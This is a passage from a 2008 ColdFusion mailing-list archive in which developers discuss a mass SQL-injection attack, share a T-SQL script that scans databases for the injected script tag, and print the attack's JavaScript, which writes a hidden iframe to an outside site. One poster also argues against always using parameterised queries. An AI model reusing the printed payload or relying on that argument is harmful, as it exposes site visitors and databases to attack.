to run this on each of your databases:

-- start
CREATE TABLE [dbo].[Infected](
[TableName] [varchar](255) NULL,
[ColumnName] [varchar](4000) NULL
);

DECLARE @T nvarchar(255)
DECLARE @C nvarchar(4000)
DECLARE @SQL nvarchar(4000)

-- every ntext (99), text (35), nvarchar (231) or varchar (167) column of every user table
DECLARE Table_Cursor CURSOR FOR 
select a.name, 
b.name 
from sysobjects a,syscolumns b 
where a.id=b.id 
and a.xtype='u' 
and (b.xtype=99 
or b.xtype=35 
or b.xtype=231 
or b.xtype=167)  
open Table_Cursor
fetch next from Table_Cursor into @T,@C
while @@fetch_status = 0
begin
-- the archived copy shows [EMAIL PROTECTED] where the list's address scrubber
-- ate the '+@C+' and '+@T+' concatenations; they are restored here
set @SQL = 'DECLARE @V varchar(4000); SET @V = NULL; SELECT
TOP 1 @V = ' + @C + ' FROM ' + @T + ' WHERE '+@C+' LIKE 
''%</title><script
src=http://1.verynx.cn/w.js></script>%''; IF (@V IS NOT NULL) BEGIN INSERT INTO
dbo.Infected (tableName, ColumnName) VALUES ('''+@T+''','''+@C+''') END'
PRINT @SQL
EXECUTE sp_executesql @SQL
fetch next from Table_Cursor into @T,@C
END

CLOSE Table_Cursor
DEALLOCATE Table_Cursor
-- end

-Original Message-
From: Brad Wood [mailto:[EMAIL PROTECTED] 
Sent: Monday, July 21, 2008 1:49 PM
To: CF-Talk
Subject: RE: (ot) URL Hack Attempt Leaves Me Scractching My Head...

The hacker's hope is that you will be outputting one of those varchar fields
into a webpage without escaping HTML characters.  The extra text being
inserted into the database fields will include a malicious JavaScript file
from another server into the webpage.  I haven't looked at the JS to see
what it does, but it probably tries to load some Trojan via an active X
applet or something.

To clean your database, I would recommend reverse-engineering the attack to
loop over your database columns and remove the text they placed in there.
In the mean time, shut your site down so you don't infect your customers.

~Brad



Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309374


RE: (ot) URL Hack Attempt Leaves Me Scractching My Head...

2008-07-21 Thread Andy Matthews
I took the time to save out all of the code from the JS file that was
inserted.

Anyone that would like this code, please contact me off list and I'll be
happy to zip it up for you. 

-Original Message-
From: Claude Schneegans [mailto:[EMAIL PROTECTED] 
Sent: Monday, July 21, 2008 2:25 PM
To: CF-Talk
Subject: Re: (ot) URL Hack Attempt Leaves Me Scractching My Head...

 For what it's worth, the specific URL that was injected in the sample I
saw
(http://1.verynx.cn/w.js) doesn't seem to work anymore. The server name
doesn't resolve.

===

Yeah, that sucks, I was going to dissect it.

It is broken now, but this morning I was able to see the code.
Apparently all it was doing was to document.write some code containing an
iFrame with an address to another Chinese site:
http://ll80.com/.
I've opened the site, but it is all Chinese for me ;-)

--
___
REUSE CODE! Use custom tags;
See http://www.contentbox.com/claude/customtags/tagstore.cfm
(Please send any spam to this address: [EMAIL PROTECTED]) Thanks.




Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309375


RE: (ot) URL Hack Attempt Leaves Me Scractching My Head...

2008-07-21 Thread Andy Matthews
We're getting hit with this attack via a wide range of hosted domains, and
various files. Sitemap.cfm is a common one at this point. 


andy

-Original Message-
From: Gerald Guido [mailto:[EMAIL PROTECTED] 
Sent: Monday, July 21, 2008 12:02 PM
To: CF-Talk
Subject: Re: (ot) URL Hack Attempt Leaves Me Scractching My Head...

We're getting hit hard today with this.

/rss.cfm?

Is it just rss.cfm? I haven't looked at our logs yet. Where did you see
this? The server log files?

~~G~~

On Mon, Jul 21, 2008 at 12:53 PM, Kris Jones [EMAIL PROTECTED]
wrote:

 We're getting hit hard today with this. They're failing, because we 
 use cfqueryparam and cfprocparam. But it is quite annoying.

 -KJ

 



Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309376


RE: (ot) URL Hack Attempt Leaves Me Scractching My Head...

2008-07-21 Thread Mark Kruger
Brad/dave,

Back when it was working the script did little more than insert a link into
the page that sent the user to a targeted links site/page... In other words
it was a basic spam traffic generator - at least the ones on our sites.

-mark
 


Mark A. Kruger, CFG, MCSE
(402) 408-3733 ext 105
www.cfwebtools.com
www.coldfusionmuse.com
www.necfug.com

-Original Message-
From: Brad Wood [mailto:[EMAIL PROTECTED] 
Sent: Monday, July 21, 2008 2:08 PM
To: CF-Talk
Subject: RE: (ot) URL Hack Attempt Leaves Me Scractching My Head...

For what it's worth, the specific URL that was injected in the sample I saw
(http://1.verynx.cn/w.js) doesn't seem to work anymore. The server name
doesn't resolve.

===

Yeah, that sucks, I was going to dissect it.  It appears that DNS is
resolving it to 127.0.0.1.  I didn't know you could do that.  verynx.cn
resolves to 121.12.169.186, but it returns a 404 when I submit a GET for
w.js.   

Hmm, some off-shore joint.  Asia Pacific Network Information Centre
owns the IP the domain resolves to.  Shows up as possibly being in Beijing,
China.



Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309377


Re: (ot) URL Hack Attempt Leaves Me Scractching My Head...

2008-07-21 Thread Claude Schneegans
 That's fine, until the attack pattern contains something else, like 
Unicode
sequences.

Not from the same address though, because it is banned now.
And the purpose of my code is not to replace CFQUERYPARAM.
It is to add an extra feature that will not only protect the database, 
but ALSO
the whole site, because the guy won't be able to open any other page.

 Figuring out what patterns to deny is a losing battle.

Look at what <CFQUERYPARAM CFSQLType="CF_SQL_INTEGER" ...> does:
It triggers an error if the parameter is not an integer.
My code does exactly the same thing, PLUS it bans the intruder in case 
some known attack pattern is detected.

-- 
___
REUSE CODE! Use custom tags;
See http://www.contentbox.com/claude/customtags/tagstore.cfm
(Please send any spam to this address: [EMAIL PROTECTED])
Thanks.


Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309378


RE: (ot) URL Hack Attempt Leaves Me Scractching My Head...

2008-07-21 Thread Mark Kruger
And embedded in his code is one of the other ways of executing SQL - using
sp_executesql. His script is better than mine I think. 


Mark A. Kruger, CFG, MCSE
(402) 408-3733 ext 105
www.cfwebtools.com
www.coldfusionmuse.com
www.necfug.com

-Original Message-
From: Andy Matthews [mailto:[EMAIL PROTECTED] 
Sent: Monday, July 21, 2008 2:37 PM
To: CF-Talk
Subject: RE: (ot) URL Hack Attempt Leaves Me Scractching My Head...

Just an FYI...

Our DBA (Ryan Cooper) took this same route and this is what he came up with.
Thought I'd share this with the group on his behalf. He notes that you need
to run this on each of your databases:

-- start
CREATE TABLE [dbo].[Infected](
[TableName] [varchar](255) NULL,
[ColumnName] [varchar](4000) NULL
);

DECLARE @T nvarchar(255)
DECLARE @C nvarchar(4000)
DECLARE @SQL nvarchar(4000)

DECLARE Table_Cursor CURSOR FOR
select a.name,
b.name
from sysobjects a,syscolumns b
where a.id=b.id
and a.xtype='u' 
and (b.xtype=99
or b.xtype=35
or b.xtype=231
or b.xtype=167)
open Table_Cursor
fetch next from Table_Cursor into @T,@C
while @@fetch_status = 0
begin
-- [EMAIL PROTECTED] in the archived copy stands for the '+@C+' / '+@T+' concatenations
set @SQL = 'DECLARE @V varchar(4000); SET @V = NULL; SELECT
TOP 1 @V = ' + @C + ' FROM ' + @T + ' WHERE '+@C+' LIKE 
''%</title><script
src=http://1.verynx.cn/w.js></script>%''; IF (@V IS NOT NULL) BEGIN INSERT INTO
dbo.Infected (tableName, ColumnName) VALUES ('''+@T+''','''+@C+''') END'
PRINT @SQL
EXECUTE sp_executesql @SQL
fetch next from Table_Cursor into @T,@C
END

CLOSE Table_Cursor
DEALLOCATE Table_Cursor
-- end

-Original Message-
From: Brad Wood [mailto:[EMAIL PROTECTED]
Sent: Monday, July 21, 2008 1:49 PM
To: CF-Talk
Subject: RE: (ot) URL Hack Attempt Leaves Me Scractching My Head...

The hacker's hope is that you will be outputting one of those varchar fields
into a webpage without escaping HTML characters.  The extra text being
inserted into the database fields will include a malicious JavaScript file
from another server into the webpage.  I haven't looked at the JS to see
what it does, but it probably tries to load some Trojan via an active X
applet or something.

To clean your database, I would recommend reverse-engineering the attack to
loop over your database columns and remove the text they placed in there.
In the mean time, shut your site down so you don't infect your customers.

~Brad





Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309379


Re: (ot) URL Hack Attempt Leaves Me Scractching My Head...

2008-07-21 Thread Claude Schneegans
 What other ways are there? I know of two: EXEC and EXECUTE

"http" (http injection) and "user" (SQL injection) are classics.

-- 
___
REUSE CODE! Use custom tags;
See http://www.contentbox.com/claude/customtags/tagstore.cfm
(Please send any spam to this address: [EMAIL PROTECTED])
Thanks.


Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309380


RE: (ot) URL Hack Attempt Leaves Me Scractching My Head...

2008-07-21 Thread Andy Matthews
I'm just talking about executing SQL, not SQL injection methods. 

-Original Message-
From: Claude Schneegans [mailto:[EMAIL PROTECTED] 
Sent: Monday, July 21, 2008 2:41 PM
To: CF-Talk
Subject: Re: (ot) URL Hack Attempt Leaves Me Scractching My Head...

 What other ways are there? I know of two: EXEC and EXECUTE

"http" (http injection) and "user" (SQL injection) are classics.

--
___
REUSE CODE! Use custom tags;
See http://www.contentbox.com/claude/customtags/tagstore.cfm
(Please send any spam to this address: [EMAIL PROTECTED]) Thanks.




Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309381


cfpod overflow in IE

2008-07-21 Thread Bob Walasek
Good day!
I'm having a problem with the cfpod tag in coldfusion 8 - seems to be an issue 
in IE only. When the pod contents exceed the pod's defined width, Firefox 
correctly maintains the width of the pod and adds a horizontal scroll bar to 
the bottom of the pod. IE, on the other hand, displays the full width of the 
content, causing the pod body to be wider than it should be (although the 
header maintains the defined width.) The culprit in IE appears to be the 'ypod' 
class on the 1st div that coldfusion generates - it has an inline style which 
includes an overflow: visible; attribute. If I change that in the generated 
code so that first div has overflow:auto and view with IE, it looks the way 
it should, i.e. it stays within the defined pod boundaries. Any ideas on how I 
can override this to get pods to display correctly in IE? Here is some sample 
coldfusion code that demonstrates the problem:


this is a test of pod size
   <cfpod name="test"
   overflow="auto"
   width="100"
   height="100"
   title="Test Pod">
   <div style="width:200px">
   test - this is a test of a long line in a small pod
   </div>
   </cfpod> 

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309382


Re: (ot) URL Hack Attempt Leaves Me Scractching My Head...

2008-07-21 Thread Bryan Stevenson
...and all hackers ALWAYS use the same IP...'cause they'd never get
caught that way...hehe

yes...that was meant to be sarcastic ;-)

I see where you're coming from Claude, I just think (as Dave appears to)
that you're wasting your time...let CFQUERYPARAM do what it's meant to.

Cheers
-  


Bryan Stevenson B.Comm.
VP  Director of E-Commerce Development
Electric Edge Systems Group Inc.
phone: 250.480.0642
fax: 250.480.1264
cell: 250.920.8830
e-mail: [EMAIL PROTECTED]
web: www.electricedgesystems.com
 
Notice:
This message, including any attachments, is confidential and may contain
information that is privileged or exempt from disclosure. It is intended
only for the person to whom it is addressed unless expressly authorized
otherwise by the sender. If you are not an authorized recipient, please
notify the sender immediately and permanently destroy all copies of this
message and attachments.


On Mon, 2008-07-21 at 15:39 -0400, Claude Schneegans wrote:
 That's fine, until the attack pattern contains something else, like 
 Unicode
 sequences.
 
 Not from the same address though, because it is banned now.
 And the purpose of my code is not to replace CFQUERYPARAM.
 It is to add an extra feature that will not only protect the database, 
 but ALSO
 the whole site, because the guy won't be able to open any other page.
 
  Figuring out what patterns to deny is a losing battle.
 
 Look at what CFQUERYPARAM CFSQLType = CF_SQL_INTEGER ... does:
 It triggers an error if the parameter is not an integer.
 My code does exactly the same thing, PLUS it bans the intruder in case 
 some known attack pattern is detected.
 



Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309383


RE: (ot) URL Hack Attempt Leaves Me Scractching My Head...

2008-07-21 Thread Che Vilnonis
For me, all attempts are focusing on rss.cfm. Another post said they saw
sitemap.cfm being hit. Can anyone confirm any other templates that are being
hit? Perhaps only 'commonly named' templates are being hit?

Che


Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309384


RE: (ot) URL Hack Attempt Leaves Me Scractching My Head...

2008-07-21 Thread Brad Wood
Easy.  sp_executesql

The point here is, you can spend a lifetime guessing every bad way a
hacker can ruin your database.  The root cause however is that your
input is not bound to a parameter in your SQL statement.  Cfqueryparam
closes that hole for good.  Whether you want to ban people's IPs and
junk is up to you, but that can be a slippery slope when you start
banning legit people because they typed the word execute into a
comments form.

~Brad


-Original Message-
From: Andy Matthews [mailto:[EMAIL PROTECTED] 
Sent: Monday, July 21, 2008 2:47 PM
To: CF-Talk
Subject: RE: (ot) URL Hack Attempt Leaves Me Scractching My Head...

I'm just talking about executing SQL, not SQL injection methods. 

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309385


Re: (ot) URL Hack Attempt Leaves Me Scractching My Head...

2008-07-21 Thread Jerry Johnson
I have all of the js files open and saved to a text file, fwiw, from this
morning.

On Mon, Jul 21, 2008 at 3:24 PM, Claude Schneegans 
[EMAIL PROTECTED] wrote:

  For what it's worth, the specific URL that was injected in the sample I
 saw
 (http://1.verynx.cn/w.js) doesn't seem to work anymore. The server name
 doesn't resolve.

 ===

 Yeah, that sucks, I was going to dissect it.

 It is broken now, but this morning I was able to see the code.
 Apparently all it was doing was to document.write some code containing
 an iFrame with an address to another Chinese site:
 http://ll80.com/.
 I've opened the site, but it is all Chinese for me ;-)



Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309386


Re: (ot) URL Hack Attempt Leaves Me Scractching My Head...

2008-07-21 Thread Mark Atkinson
We've been dealing with these too - to address Che's question they were 
crawling here for pages with query strings but not much else - as well 
as our implementing solutions offered here (much appreciation to all), 
our net. admin. simply shut down these attacks at the firewall - 
Sonicwall is the name of our firewall and it apparently updates every 
ten minutes to include defenses against things like this. Our logs are 
very clean now - although DB's a mess. :-)  N.A. left for the day before 
I got back to email but I will attempt to discover what he did and post 
here.

HTH
Mark

Che Vilnonis wrote:
 For me, all attempts are focusing on rss.cfm. Another post said they saw
 sitemap.cfm being hit. Can anyone confirm any other templates that are being
 hit? Perhaps only 'commonly named' templates are being hit?

 Che


 

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309387



Re: (ot) URL Hack Attempt Leaves Me Scractching My Head...

2008-07-21 Thread Jerry Johnson
The attempts are based on a google search of .cfm files with parameters that
can be exploited.

(They have automated the page search, as well as the attack itself.)

It is not a cf specific attack, but is also nailing php, asp, and .net
sites.

Here is a decent writeup of it all.

http://www.bloombit.com/Articles/2008/05/ASCII-Encoded-Binary-String-Automated-SQL-Injection.aspx



On Mon, Jul 21, 2008 at 4:05 PM, Che Vilnonis [EMAIL PROTECTED] wrote:

> For me, all attempts are focusing on rss.cfm. Another post said they saw
> sitemap.cfm being hit. Can anyone confirm any other templates that are
> being hit? Perhaps only 'commonly named' templates are being hit?



Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309388


Mystery Character

2008-07-21 Thread Robert Harrison
Does anyone know the character code for this character: .

My Mac users are uploading files with this character and it does not work in
a URL string... I'd kill it but I don't know what character it is. Using .
in a regex replace does not work. 



Robert B. Harrison
Director of Interactive services
Austin & Williams
125 Kennedy Drive, Suite 100 Hauppauge NY 11788
T : 631.231.6600 Ext. 119 
F : 631.434.7022
www.austin-williams.com

Great advertising can't be either/or... It must be .



Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309389


RE: Mystery Character

2008-07-21 Thread Robert Harrison
NO. The character got converted to a period. It looks like a bullet.


Robert B. Harrison
Director of Interactive services
Austin & Williams
125 Kennedy Drive, Suite 100 Hauppauge NY 11788
T : 631.231.6600 Ext. 119 
F : 631.434.7022
www.austin-williams.com

Great advertising can't be either/or... It must be .



Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309390


Re: (ot) URL Hack Attempt Leaves Me Scractching My Head...

2008-07-21 Thread Cameron Johnson
We got hit, and, according to the IIS logs, they hit non-standard templates in 
varied directories:

/indexPrint.cfm
/events/institute.cfm
/search/TaxonomyResults.cfm
/conferences/article.cfm
/applications/statsmap/detail.cfm

I don't see much of a pattern.

Cameron


> For me, all attempts are focusing on rss.cfm. Another post said they saw
> sitemap.cfm being hit. Can anyone confirm any other templates that are being
> hit? Perhaps only 'commonly named' templates are being hit?
>
> Che

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309391


RE: Mystery Character

2008-07-21 Thread Experienced CF Developer
Robert,

Can't see the character, but check out http://www.asciitable.com and see if
you can find it there.

Dave



Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309392


Re: (ot) URL Hack Attempt Leaves Me Scractching My Head...

2008-07-21 Thread Kris Jones
I can confirm that many templates in our site are being hit. And they
are not commonly named.

-KJ

> For me, all attempts are focusing on rss.cfm. Another post said they saw
> sitemap.cfm being hit. Can anyone confirm any other templates that are being
> hit? Perhaps only 'commonly named' templates are being hit?

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309393


RE: (ot) URL Hack Attempt Leaves Me Scractching My Head...

2008-07-21 Thread Dave Watts
> Yeah, that sucks, I was going to dissect it.  It appears that 
> DNS is resolving it to 127.0.0.1.  I didn't know you could do 
> that.  verynx.cn resolves to 121.12.169.186, but it returns a 
> 404 when I submit a GET for w.js.

Here's a sample, from another .js file used:

window.status="";
n=navigator.userLanguage.toUpperCase();
if((n!="ZH-CN")&&(n!="UR")&&(n!="RU")&&(n!="KO")&&(n!="ZH-TW")&&(n!="ZH")&&(
n!="HI")&&(n!="TH")&&(n!="UR")&&(n!="VI")){
var cookieString = document.cookie;
var start = cookieString.indexOf("dssndd=");
if (start != -1){}else{
var expires = new Date();
expires.setTime(expires.getTime()+9*3600*1000);
document.cookie = "dssndd=update;expires="+expires.toGMTString();
try{
document.write("<iframe src=http://lodse.ru/cgi-bin/index.cgi?ad width=0 height=0 frameborder=0></iframe>");
}
catch(e)
{
};
}}

The URL in the iframe appears to simply redirect to msn.com. So, it looks
like the purpose of the attack is click-fraud.

Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/

Fig Leaf Software provides the highest caliber vendor-authorized
instruction at our training centers in Washington DC, Atlanta,
Chicago, Baltimore, Northern Virginia, or on-site at your location.
Visit http://training.figleaf.com/ for more information!

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309394


RE: (ot) URL Hack Attempt Leaves Me Scractching My Head...

2008-07-21 Thread Dave Watts
> Not from the same address though, because it is banned now.

This appears to be a botnet-driven attack. Blocking addresses may be
problematic in that case.

> And the purpose of my code is not to replace CFQUERYPARAM.

That's fine. My concern isn't really with you, Claude, but with people who
might read your remarks and think that what you're doing is a valid
substitute for CFQUERYPARAM - because it's not.

> It is to add an extra feature that will not only protect the 
> database, but ALSO the whole site, because the guy won't be 
> able to open any other page.

If you're using CFQUERYPARAM as well, this doesn't really add any protection
to the database. If you're not, the protection it does add is far from
complete. Again, that's really my concern with your proposal.

> > Figuring out what patterns to deny is a losing battle.
>
> Look at what <CFQUERYPARAM CFSQLType="CF_SQL_INTEGER" ...> does:
> It triggers an error if the parameter is not an integer.
> My code does exactly the same thing, PLUS it bans the 
> intruder in case some known attack pattern is detected.

On its face, your comparison seems valid. But that's not really what
CFQUERYPARAM does. Or at least, it's an incomplete description.

What it does is separate data from executable code. This mechanism prevents
data from being executed as code. The specific type of data is really
invalid, and it'll work with any data now and in the future. It's as close
to a foolproof mechanism as you're going to find. While it does validate
specific data types, its real power is in this separation of data from code.

Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/

Fig Leaf Software provides the highest caliber vendor-authorized
instruction at our training centers in Washington DC, Atlanta,
Chicago, Baltimore, Northern Virginia, or on-site at your location.
Visit http://training.figleaf.com/ for more information!
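To put Dave's data-versus-code point in CFML, here is a constructed example, added to this archive and not posted by anyone in the thread: the concatenated query these bots are probing for, the integer-check approach Claude describes (which covers only the integer parameter), and the parameterised form, where the SQL text is fixed and the values travel separately. The datasource, table and column names are assumptions.

```cfml
<!--- Constructed example (not from the CF-Talk thread). Assumes a datasource
      "mysite" and an articles table with integer categoryID and varchar title. --->

<!--- 1. Vulnerable: request values are pasted into the SQL text, so whatever the
        bot puts in url.cat or url.q is parsed by SQL Server as part of the statement. --->
<cfquery name="qVulnerable" datasource="mysite">
    SELECT articleID, title
    FROM   articles
    WHERE  categoryID = #url.cat#
    AND    title LIKE '%#url.q#%'
</cfquery>

<!--- 2. The integer-check approach: refuse the request unless url.cat is a whole number.
        This does protect the categoryID comparison, but it says nothing about url.q,
        which is a string and cannot be validated by type alone. --->
<cfif NOT IsNumeric(url.cat) OR Int(url.cat) NEQ url.cat>
    <cfthrow type="BadRequest" message="cat must be an integer">
</cfif>

<!--- 3. Parameterised: the SQL text never changes, the values are bound separately,
        so the database cannot execute request data as code, whatever its type.
        cf_sql_integer also rejects non-integer input before the query is sent, and the
        constant SQL text lets SQL Server reuse the execution plan across requests. --->
<cfquery name="qSafe" datasource="mysite">
    SELECT articleID, title
    FROM   articles
    WHERE  categoryID = <cfqueryparam value="#url.cat#" cfsqltype="cf_sql_integer">
    AND    title LIKE <cfqueryparam value="%#url.q#%" cfsqltype="cf_sql_varchar" maxlength="100">
</cfquery>
```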

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309395


RE: (ot) URL Hack Attempt Leaves Me Scractching My Head...

2008-07-21 Thread Dave Watts
> What other ways are there? I know of two: EXEC and EXECUTE.

Some people already mentioned sp_executesql, which is the preferred approach
nowadays. But what about Unicode character conversion? What about from the
shell using sp_cmdshell to fetch batch files remotely and execute them with
isql/osql? For all I know, there may be other approaches as well.

Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/

Fig Leaf Software provides the highest caliber vendor-authorized
instruction at our training centers in Washington DC, Atlanta,
Chicago, Baltimore, Northern Virginia, or on-site at your location.
Visit http://training.figleaf.com/ for more information!

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309397


RE: (ot) URL Hack Attempt Leaves Me Scractching My Head...

2008-07-21 Thread Che Vilnonis
Here's another question. Are sites that rewrite URLs (i.e., no .cfm
extension in the url) more or less NOT being hit by these malbots?


Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309396


Re: (ot) URL Hack Attempt Leaves Me Scractching My Head...

2008-07-21 Thread Claude Schneegans
> ...and all hackers ALWAYS use the same IP 'cause they'd never get
> caught that way...hehe

> yes...that was meant to be sarcastic

It does not look sarcastic to me, just may be a little retarded ;-)

> I see where you're coming from Claude, I just think (as Dave appears to)
> that you're wasting your time

I'm not wasting my time, I'm saving my server time.
At a certain time I used to have many errors in the "server too busy" or 
"memory error" category.

I also discovered that a huge amount of the traffic on my server was due 
to robots, so I decided to control this traffic more specifically.
I first optimized for the good robots like Google, Yahoo, MSN etc. using
pertinent <meta name="revisit-after" content="n Days"> tags and other 
tricks.

And I also tracked bad bots and fake browsers.
Just look at your logs, and you'll be amazed by the amount of traffic 
caused by
- browsers that never request images, probably bots...
- experimental robots (I don't care if students experiment with things, I 
just don't want to be the guinea pig)
- robots that do not embed an address to explain why they are searching 
your sites,
- robots that read all images to detect if one of them is copyrighted 
and illegally used (huge traffic)
- Chinese robots that check if your site should be banned from China 
because it talks about human rights,
- AND also spammers and hackers of course,
 etc.

So I designed my own robot detection tools, and spam or SQL injection 
attempts are only extra tools I use to classify robots, and just a drop 
in the ocean of sh%$/? I'm getting away. ;-)
And yes, my server is much more stable now.
And also, the statistics I show to my customers are realistic.

Of course, I also use CFQUERYPARAM as an ultimate protection.

-- 
___
REUSE CODE! Use custom tags;
See http://www.contentbox.com/claude/customtags/tagstore.cfm
(Please send any spam to this address: [EMAIL PROTECTED])
Thanks.


Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309398


RE: Mystery Character

2008-07-21 Thread Robert Harrison
I don't see that character in the ASCII list, but it's a bullet character.
Mac users can insert it into file names using option 8 on the Mac. 

When they upload a file with that character it converts to something else
(also not in the ASCII list) that can't be found when used in a URL string. 

I'd replace or strip the character on upload but I can't figure out how to
make CF even see it. All I know is it's Option 8 on Mac.
 


Robert B. Harrison
Director of Interactive services
Austin & Williams
125 Kennedy Drive, Suite 100 Hauppauge NY 11788
T : 631.231.6600 Ext. 119 
F : 631.434.7022
www.austin-williams.com

Great advertising can't be either/or... It must be .




Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309399


Re: Mystery Character

2008-07-21 Thread morgan l
Try here:
http://www.miniguidez.com/macosx/keystrokesguide/specialcharacters/specialcharacters.html
It lists decimal and hex values for corresponding mac keystrokes.


Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309400


Re: (ot) URL Hack Attempt Leaves Me Scractching My Head...

2008-07-21 Thread Claude Schneegans
> This appears to be a botnet-driven attack. Blocking addresses may be
> problematic in that case.

Why do you all want to interpret this as a final solution?
Blocking an IP will NOT block ANY attack, it will just stop the current 
attack from THIS address, period.
But it is safer than letting the malbot try every page it can find,... 
until it does find one in which CFQUERYPARAM was forgotten.

> If you're using CFQUERYPARAM as well, this doesn't really add any 
> protection to the database. If you're not, the protection it does add 
> is far from complete. Again, that's really my concern with your proposal.

I use this method ONLY in the case a url variable is supposed to 
contain an integer value.
And in THAT CASE only, and for that variable only, the CFQUERYPARAM is 
useless, because if the variable contains anything other than a number, 
the query will never get executed anyway.

CFQUERYPARAM is a nice and powerful feature, but it makes SQL code more 
difficult to read, so the best is to use it only when it is really necessary.
For me, using CFQUERYPARAM systematically for every parameter is as stupid
as never using it at all.


-- 
___
REUSE CODE! Use custom tags;
See http://www.contentbox.com/claude/customtags/tagstore.cfm
(Please send any spam to this address: [EMAIL PROTECTED])
Thanks.


Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309401


RE: Mystery Character

2008-07-21 Thread Brad Wood
I've run into things like this before.  Is there a CF function (or even
a way in Java) to take a character and return the ASCII code for it?
(Or whatever is appropriate, I don't know if ASCII is really the right
term)

~Brad


Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309402


RE: Mystery Character

2008-07-21 Thread Experienced CF Developer
Doesn't asc('x') do that?  Or am I missing something?

Dave



Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309403


RE: Mystery Character

2008-07-21 Thread Experienced CF Developer
Actually, I just looked it up:

http://livedocs.adobe.com/coldfusion/6/CFML_Reference/functions-pt121.htm

According to this page, starting in MX 6, asc() supports values up to 65536,
so it should work for you.

Output your character value to the screen with asc(sFunkyCharacter) and
you'll find out the value of it.

Another thing you could do, if you really wanted to, is check the asc()
value of each character in your string and, if it exceeds 255, leave that
character out.  That will ensure it works properly on the Windows file system
(which I'm assuming is the issue you are having).

Dave


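A constructed example (added to this archive, not posted by anyone in the thread) of the diagnosis and cleanup Dave suggests, applied to an uploaded file name. It goes a little further than the "above 255" rule by keeping only characters that are safe in a URL. The bullet that Option-8 types on a Mac is U+2022, for which Asc() returns 8226; the function and variable names are mine.

```cfml
<!--- Constructed example, not code from the CF-Talk thread.
      Diagnostic step: show what Asc() returns for each character, so a bullet that
      renders as "." in mail shows up as 8226. --->
<cffunction name="describeChars" returntype="string" output="false">
    <cfargument name="str" type="string" required="true">
    <cfset var out = "">
    <cfset var i = 0>
    <cfset var ch = "">
    <cfloop from="1" to="#Len(arguments.str)#" index="i">
        <cfset ch = Mid(arguments.str, i, 1)>
        <cfset out = ListAppend(out, ch & "=" & Asc(ch), " ")>
    </cfloop>
    <cfreturn out>
</cffunction>

<!--- Cleanup step: keep letters, digits, dot, dash and underscore; replace everything
      else (the bullet, anything above 127, spaces, other punctuation) with "_".
      Call this on cffile.clientFile before saving the upload, so the stored name
      and the URL you build from it can never disagree. --->
<cffunction name="cleanFileName" returntype="string" output="false">
    <cfargument name="fileName" type="string" required="true">
    <cfset var result = "">
    <cfset var i = 0>
    <cfset var ch = "">
    <cfset var code = 0>
    <cfloop from="1" to="#Len(arguments.fileName)#" index="i">
        <cfset ch = Mid(arguments.fileName, i, 1)>
        <cfset code = Asc(ch)>
        <cfif (code GTE 48 AND code LTE 57) OR (code GTE 65 AND code LTE 90)
              OR (code GTE 97 AND code LTE 122) OR ch EQ "." OR ch EQ "-" OR ch EQ "_">
            <cfset result = result & ch>
        <cfelse>
            <cfset result = result & "_">
        </cfif>
    </cfloop>
    <cfreturn result>
</cffunction>

<!--- Constructed sample name: Chr(8226) is the Mac Option-8 bullet. --->
<cfset sample = "Q2 Report " & Chr(8226) & " final.pdf">
<cfoutput>
#describeChars(sample)#<br>
#cleanFileName(sample)#
</cfoutput>
```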

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309404


RE: Mystery Character

2008-07-21 Thread Brad Wood
Well there you have it!  That was pretty simple...

Thanks Dave.


Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309405


Re: Problems with switching from application.cfm to application.cfc

2008-07-21 Thread Richard Steele
I like your idea:

<cffunction name="onRequest" ...>
<cfargument name="targetPage">
<cfset xcachepath = "/cache">
...
<cfinclude template="#Arguments.targetPage#">
...
</cffunction>


However I'm not sure how to implement this. What is the targetpage? Since this 
is the root application.cfc there are many different index pages that this 
application.cfc will use. 

Here's another example of my stripped down cfc:
<cfcomponent>

<cffunction name="onRequestStart" returnType="boolean" output="false">

<CFAPPLICATION NAME="mywebsite" SESSIONMANAGEMENT="Yes" 
sessiontimeout="#CreateTimeSpan(0,0,20,0)#" setclientcookies="yes">

<CFSET xServerPath = "c:\inetpub\wwwroot\clients\mywebsite\html">
<cfset application.googlekey = "ABQIGLygu72xTxPUIqNs3HgaixRGoefddpfKqX6LEQeDUC4B8xTs1enEDprVOV5TidrQOUmVZpW7QA">

<cfsetting showdebugoutput="no">

